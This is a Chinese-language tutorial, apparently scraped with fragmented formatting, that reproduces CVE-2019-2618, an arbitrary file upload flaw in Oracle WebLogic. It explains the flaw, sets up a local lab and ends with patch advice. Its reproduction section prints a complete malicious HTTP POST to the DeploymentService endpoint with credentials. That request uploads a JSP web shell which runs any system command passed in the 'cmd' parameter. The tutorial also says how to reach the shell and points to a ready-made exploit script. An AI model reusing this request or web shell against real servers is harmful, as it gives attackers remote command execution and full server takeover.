cve-2019-2618 weblogic任意文件上传漏洞cve-2019-2618复现 作者mature_W

1、CVE-2019-2618 WebLogic任意文件上传漏洞（CVE-2019-2618）复现 作者：Mature原文链接：/s/uBs-TkHFSSv7_Dv-CXGdng本文由 干货 收集整理：/test/index.phpWebLogic组件介绍 WebLogic是美国Oracle公司出品的一个applicationserver，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据 库应用的Java应用服务器。 将Java的动态功能和J

2、ava Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。WebLogic是商业市场上主要的Java（J2EE）应用服务器软件（application server） 之一，是世界上第一个成功商业化的J2EE应用服务器，具有可扩展性，快速开发，灵活，可靠性等优势。 漏洞分析 CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口，该接口支持向服务器上传任意文件。攻击者突破了OAM（Oracle Access Management）认证，设置wl_request_type参数为app_upload，构造文件上传格式的P

3、OST请求包，上传jsp木马文件，进而可以获得整个服务器的权限。 影响范围 目前据统计，在全球范围内对互联网开放WebLogic的资产数量多达35,894台，其中归属中国地区的受影响资产数量为1万以上。 目前受影响的WebLogic版本：WebLogic 、、环境搭建： 1. weblogic.0安装 下载地址： /technetwo . ownloads/index.html开始安装：(需要java环境支持，记得配置JAVA环境变量)82. 打开cmd执行： C:Progra1Javaj

4、dk1.8.0_121binjava -jar fmw_.0_wls.jar用 C:Program FilesJavajdk1.8.0_121bin 目录下的 java.exe 来执行weblogic12c的jar包（默认使用顺序，似乎首先用的是C:Program FilesJavajdk1.8.0_121jrebin下的java.exe，所以会包jre不是有效的JDK），所以在cmd里要输入C:Progra1Javajdk1.8.0_121binjava - jar fmw_.0_wls.jar（这里之所以要用Progra1 来代替Program Files是

5、因为有 空格 会识别错误） 3. 等待一会会弹出安装程序： 4. 安装完成后会出现配置向导(有一项是配置weblogic的账户和 的，要记住这个账号和 。复现会用到)5. 配置完成后，找到startWebLogic.cmd双击启动weblodgic6.访问 :7001/console 验证 复现： 1. 访问 :7001/console ，利用burpsuit抓包。将数据包修改为poc： POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1 Host: 127.0.0

6、.1:7001User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0 Accept: text/html, image/gif, image/jpeg, */*; q=.2Connection: keep-alive username: weblogic password: Asd123456 wl_request_type: app_uploadwl_upload_application_name: .tmp_WL_internalbea_wls_internal9j4dqk

7、war wl_upload_delta: truearchive: true serverName: pyn3rd server_version: Content-Type: multipart/form-data; boundary= 55365303813990412251182616919Content-Length: 1130 55365303813990412251182616919Content-Disposition: form-data; name=img; filename=shell11.jsp Content-Type: application/octet

8、-streamCommands with JSP%if (request.getParameter(cmd) != null) out.println(Command: + request.getParameter(cmd) + ); Process p;if ( System.getProperty().toLowerCase().indexOf(windows) != -1)p = Runtime.getRuntime().exec(cmd.exe /C + request.getParameter(cmd);elsep = Runtime.getRuntime().exec

9、(request.getParameter(cmd);OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine();while ( disr != null ) out.println(disr); disr = dis.readLine();% 55365303813990412251182616919 2. 发送到Repeater，将需要修改的地方改掉

10、.点击go。可以看到成功上传，并显示了路径。 3. 我们可以直接通过访问： :7001/bea_wls_internal/she l11.jsp 来访问我们上传的文件。 我们上传的文件是一个简单的执行系统命令的文件。可以更改POC中shell11.jsp的内容来上传不同的文件。 4. 附 一 个 github 上 的 py 脚 本 : /jas502n/cve-2019-2618 脚本使用： 修复建议： Oracle官方已经在关键补丁更新（CPU）中修复了该漏洞相关链接： /technetwork/security-advisory/cpuapr2019-5072813.html请受影响用户